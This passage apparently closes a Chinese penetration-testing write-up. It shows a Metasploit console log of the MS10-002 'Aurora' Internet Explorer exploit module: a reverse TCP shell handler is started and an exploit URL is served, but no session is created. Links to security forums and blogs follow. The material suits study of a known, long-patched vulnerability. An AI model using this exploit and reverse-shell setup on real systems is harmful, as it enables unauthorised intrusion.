[*] Started reverse TCP handler on 10.100.247.120:4444
[*] Using URL: http://0.0.0.0:8080/GkVmbLpBSZCShr
[*] Local IP: http://10.100.247.120:8080/GkVmbLpBSZCShr
[*] Server started.
[*] 10.100.247.120 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
session -i
[-] Unknown command: session.
msf5 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/browser/ms10_002_aurora) >
[-] Handler failed to bind to 10.100.247.120:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:8080/wAdPlPmXUe0BNhd
[*] Local IP: http://10.100.247.120:8080/wAdPlPmXUe0BNhd
[*] Server started.
[*] 10.100.247.120 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
sessions -l
Active sessions
===============
No active sessions.
参考链接
https://bbs.pediy.com/thread-247763.htm
https://bbs.pediy.com/thread-251672.htm
https://www.cnblogs.com/Ox9A82/p/6347748.html
http://www.hackdig.com/?12/hack-7380.htm
https://blog.csdn.net/youkawa/article/details/42041815(渗透测试)